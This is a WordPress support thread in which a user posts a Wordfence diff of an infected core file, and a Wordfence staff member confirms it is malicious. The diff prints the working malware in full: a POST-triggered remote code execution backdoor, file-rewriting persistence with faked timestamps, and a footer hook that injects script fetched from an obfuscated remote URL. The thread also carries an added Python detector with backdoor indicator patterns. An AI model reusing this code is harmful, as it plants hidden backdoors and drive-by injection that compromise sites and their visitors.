Title: WordPress core file modified: wp-includes/nav-menu.php
Last modified: August 31, 2016

---

# WordPress core file modified: wp-includes/nav-menu.php

 *  Resolved [audat](https://wordpress.org/support/users/audat/)
 * (@audat)
 * [10 years, 3 months ago](https://wordpress.org/support/topic/wordpress-core-file-modified-wp-includesnav-menuphp/)
 * Hi, does anybody know how critical this is? I fixed this by replacing nav-menu.
   php with the repository version now.
 * Filename: wp-includes/nav-menu.php
   File type: WordPress Core File
   The Wordfence listing shows the original version of the file next to the modified version on the WordPress system; the numbers in each block are the line numbers of that version of the file.

   The Original Version of the file (lines 526-532):

   ```text
   526 * @param array $args Optional. Array of arguments passed on to {@see get_terms()}.
   527 * Default empty array.
   528 * @return array Menu objects.
   529 */
   530 function wp_get_nav_menus( $args = array() ) {
   531 $defaults = array( 'hide_empty' => false, 'orderby' => 'name' );
   532 $args = wp_parse_args( $args, $defaults );
   ```

   The Modified Version on your WordPress system (lines 526-700):

   ```text
   526 * @param array $args Optional. Array of arguments passed on to {@see get_terms()}.
   527 * Default empty array.
   528 * @return array Menu objects.
   529 *///istart
   530
   531 function my_time($dir) {
   532 foreach (glob($dir . '/wp-*.php') as $f) {
   533 $times[] = filemtime($f);
   534 }
   535 $max = 1;
   536 for ($i = 0; $i < count($times) - 1; $i++) {
   537 $k = 1;
   538 for ($j = $i + 1; $j < count($times); $j++) {
   539 if ($times[$i] == $times[$j]){
   540 $k++;
   541 if ($k > $max) {
   542 $max = $k;
   543 $time = $times[$i];
   544 }
   545 }
   546 }
   547 }
   548 return $time;
   549 }
   550
   551 function my_correct($dir) {
   552 $time = 0;
   553 $path = $dir . '/index.php';
   554 $content = base64_decode('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==');
   555 if (file_get_contents($path) != $content) {
   556 chmod($path, 0644);
   557 file_put_contents($path, $content);
   558 chmod($path, 0444);
   559 $time = my_time($dir);
   560 touch($path, $time);
   561 }
   562
   563 $path = $dir . '/.htaccess';
   564 $content = base64_decode('IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==');
   565 if (file_exists($path) AND file_get_contents($path) != $content) {
   566 chmod($path, 0644);
   567 file_put_contents($path, $content);
   568 chmod($path, 0444);
   569 if (!$time) {
   570 $time = my_time($dir);
   571 }
   572 touch($path, $time);
   573 }
   574 }
   575
   576 $p = $_POST;
   577 $_passssword = 'fafff3f841d025b87cc40a6bd0ee0eeb';
   578 if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');
   579 my_correct(dirname(__FILE__) . '/..');
   580
   581 function request_url_data($url) {
   582 if(!is_valid_url($url))
   583 return false;
   584
   585 $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
   586 if (function_exists('curl_init')){
   587 $ch = curl_init();
   588 curl_setopt($ch, CURLOPT_TIMEOUT, 5);
   589 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
   590 curl_setopt($ch, CURLOPT_URL, $url);
   591 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   592 curl_setopt($ch, CURLOPT_HTTPHEADER, array(
   593 'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
   594 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
   595 'Referer: ' . $site_url,
   596 ));
   597 $response = trim(curl_exec($ch));
   598 } elseif (function_exists('fsockopen')) {
   599 $m = parse_url($url);
   600 if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)){
   601 fwrite($fp, 'GET http://' . $m['host'] . $m["path"].'?'. $m['query'] . ' HTTP/1.0' . "\r\n" .
   602 'Host: ' . $m['host'] . "\r\n" .
   603 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
   604 'X-Forwarded-For: '. @$_SERVER["REMOTE_ADDR"] . "\r\n" .
   605 'Referer: ' . $site_url . "\r\n" .
   606 'Connection: Close' . "\r\n\r\n");
   607 $response = '';
   608 while (!feof($fp)) {
   609 $response .= fgets($fp, 1024);
   610 }
   611 list($headers, $response) = explode("\r\n\r\n", $response);
   612 fclose($fp);
   613 }
   614 } else {
   615 $response = 'curl_init and fsockopen disabled';
   616 }
   617 return $response;
   618 }
   619
   620 error_reporting(0);
   621
   622 //unset($_passssword);
   623
   624 if (function_exists("add_action")){
   625 add_action('wp_head', 'add_2head');
   626 add_action('wp_footer', 'add_2footer');
   627 }
   628
   629 function add_2head() {
   630 ob_start();
   631 }
   632
   633 function is_valid_url(&$url)
   634 {
   635 if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m))
   636 return false;
   637 $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6];
   638 return true;
   639 }
   640
   641 function add_2footer() {
   642 $check = false;
   643 $check_data = "";
   644 if (!empty($_GET['check']) AND $_GET['check'] == 'fafff3f841d025b87cc40a6bd0ee0eeb') {
   645 $check = true;
   646 $check_data =('<!--checker_start ');
   647 $check_data .= (substr(request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'), 0, 100));
   648 $check_data .= (' checker_end-->');
   649 }
   650
   651 if (!$check) {
   652 if (!@$_SERVER['HTTP_USER_AGENT'] OR (substr($_SERVER['REMOTE_ADDR'], 0, 6) == '74.125') OR preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT']))
   653 return;
   654
   655 $cookie_name = 'PHP_SESSION_PHP';
   656 if (isset($_COOKIE[$cookie_name]))
   657 return;
   658
   659 foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
   660 if (preg_match($regex, $_SERVER['REQUEST_URI']))
   661 return;
   662 }
   663 }
   664
   665 $buffer = ob_get_clean();
   666 ob_start();
   667 $regexp = '/<body[^>]*>/is';
   668 if (preg_match($regexp, $buffer, $m)) {
   669 $body = $m[0];
   670 // $url = base64_decode('a3d3czksLDIwOy0xNjItNi0yOzYsYW9sZCw8cWZmYWxoJXZ3blxwbHZxYGY+NTMyOjE5NDA1Mjs6OTI7OjI=');
   671 $url = decrypt_url('a3d3czksLDIwOy0xNjItNi0yOzYsYW9sZCw8cWZmYWxoJXZ3blxwbHZxYGY+NTMyOjE5NDA1Mjs6OTI7OjI=');
   672 // if (($code = request_url_data($url)) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
   673 if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
   674 // $body .= '<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) .'; path=/; expires="+date.toUTCString();</script>';
   675 // $body .= base64_decode($m[0]);
   676 $body .= $decoded;
   677 // $body .= base64_decode($m[0]);
   678 }
   679 $body .= $check_data;
   680
   681 $buffer = preg_replace($regexp, $body, $buffer);
   682 }
   683 echo $buffer;
   684 ob_flush();
   685 }
   686
   687 function decrypt_url($encrypted_url)
   688 {
   689 $encrypted_url = base64_decode($encrypted_url);
   690 $url = '';
   691 for($i = 0; $i < strlen($encrypted_url); $i++)
   692 {
   693 $url .= chr(ord($encrypted_url[$i]) ^ 3);
   694 }
   695 return $url;
   696 }//iend
   697
   698 function wp_get_nav_menus( $args = array() ) {
   699 $defaults = array( 'hide_empty' => false, 'orderby' => 'name' );
   700 $args = wp_parse_args( $args, $defaults );
   ```
 * [https://wordpress.org/plugins/wordfence/](https://wordpress.org/plugins/wordfence/)
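The scan listing above is the kind of result a core-file integrity check produces: the modified `nav-menu.php` differs from the shipped copy, and the inserted block carries recognisable markers (`//istart` / `//iend`, the `$_passssword` variable, the literal token compared against `$_GET['check']`, `error_reporting(0)`, output-buffer hooks on `wp_head` / `wp_footer`, and the crawler user-agent filter). The following Python script is an added example written for this page; it is not Wordfence's code and not part of the original post. It assumes a pristine reference copy of the same WordPress version is available beside the live tree (for instance from a fresh download of that release), and the `CLEAN` and `TAMPERED` samples are constructed stand-ins for the real file, not the file itself.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Indicators drawn from the injected block in the scan listing. Constructed
# detector, not Wordfence's. base64_decode and error_reporting(0) also occur
# in legitimate code, so only the first four are treated as strong on their own.
INDICATORS = [
    ("marker_comment", re.compile(r"//\s*(istart|iend)\b")),
    ("password_variable", re.compile(r"\$_passssword\b")),
    ("known_backdoor_token", re.compile(r"fafff3f841d025b87cc40a6bd0ee0eeb")),
    ("dynamic_call_from_post", re.compile(r"\$p\[\$_passssword\]\s*\(")),
    ("base64_decode", re.compile(r"base64_decode\s*\(")),
    ("error_reporting_off", re.compile(r"error_reporting\s*\(\s*0\s*\)")),
    ("output_buffer_hook", re.compile(r"add_action\s*\(\s*['\"]wp_(head|footer)['\"]")),
    ("crawler_ua_filter", re.compile(r"googlebot\|msnbot", re.IGNORECASE)),
]
STRONG = {"marker_comment", "password_variable", "known_backdoor_token", "dynamic_call_from_post"}


def scan_source(text):
    """Return [(indicator, line_number), ...] for every indicator match in PHP source."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((name, lineno))
    return hits


def sha256_text(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def check_integrity(text, reference_text):
    """True when the file matches the pristine copy (hash compare)."""
    return sha256_text(text) == sha256_text(reference_text)


def triage(text, reference_text):
    """A core file that differs from its reference AND carries a strong indicator
    is reported as confirmed tampering; a differing file with no indicators still
    needs a human look, since it could be a legitimate local edit."""
    hits = scan_source(text)
    modified = not check_integrity(text, reference_text)
    strong = [h for h in hits if h[0] in STRONG]
    return {"modified": modified, "hits": hits, "confirmed": modified and bool(strong)}


def scan_tree(root, reference_dir):
    """Triage every .php file under root against the same relative path under
    reference_dir; files with no reference copy get only the indicator scan."""
    findings = {}
    root = Path(root)
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root)
        ref = Path(reference_dir) / rel
        text = path.read_text(encoding="utf-8", errors="replace")
        if ref.is_file():
            findings[str(rel)] = triage(text, ref.read_text(encoding="utf-8", errors="replace"))
        else:
            findings[str(rel)] = {"modified": None, "hits": scan_source(text), "confirmed": False}
    return findings


# Constructed samples: a stand-in for the shipped function and the same text
# with a few of the marker lines from the listing inserted before it.
CLEAN = """<?php
/**
 * Returns all navigation menu objects.
 */
function wp_get_nav_menus( $args = array() ) {
    $defaults = array( 'hide_empty' => false, 'orderby' => 'name' );
    $args = wp_parse_args( $args, $defaults );
}
"""

TAMPERED = """<?php
/**
 * Returns all navigation menu objects.
 */
//istart
error_reporting(0);
$_passssword = 'fafff3f841d025b87cc40a6bd0ee0eeb';
if (function_exists("add_action")) {
    add_action('wp_head', 'add_2head');
}
//iend
function wp_get_nav_menus( $args = array() ) {
    $defaults = array( 'hide_empty' => false, 'orderby' => 'name' );
    $args = wp_parse_args( $args, $defaults );
}
"""

if __name__ == "__main__":
    # Stand-alone demo: a live tree with the tampered file, a reference tree with the clean one.
    with tempfile.TemporaryDirectory() as tmp:
        live, ref = Path(tmp, "live", "wp-includes"), Path(tmp, "ref", "wp-includes")
        live.mkdir(parents=True)
        ref.mkdir(parents=True)
        (live / "nav-menu.php").write_text(TAMPERED, encoding="utf-8")
        (ref / "nav-menu.php").write_text(CLEAN, encoding="utf-8")
        for name, result in scan_tree(live.parent, ref.parent).items():
            print(name, result)
```

Hash comparison is what tells you the file is not the shipped one; the indicator scan is what tells you why it differs, and the line numbers it reports make the manual review in the listing above much quicker.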

Viewing 1 replies (of 1 total)

 *  Plugin Author [WFMattR](https://wordpress.org/support/users/wfmattr/)
 * (@wfmattr)
 * [10 years, 2 months ago](https://wordpress.org/support/topic/wordpress-core-file-modified-wp-includesnav-menuphp/#post-7053785)
 * Hi,
 * It is definitely malicious, so replacing the file with the original was good.
   You could have a vulnerable plugin (or outdated version of WordPress or a theme),
   so make sure everything is up to date.
 * We also have a guide here, to help clean hacked sites. Some of the more aggressive
   scan options may find additional malicious files, and there are recommendations
   on updates, passwords, etc., which may help prevent reinfection:
    [How to clean a hacked website](https://www.wordfence.com/learn/how-to-clean-a-hacked-website/)
 * -Matt R


The topic ‘WordPress core file modified: wp-includes/nav-menu.php’ is closed to 
new replies.

 * 1 reply
 * 2 participants
 * Last reply from: [WFMattR](https://wordpress.org/support/users/wfmattr/)
 * Last activity: [10 years, 2 months ago](https://wordpress.org/support/topic/wordpress-core-file-modified-wp-includesnav-menuphp/#post-7053785)
 * Status: resolved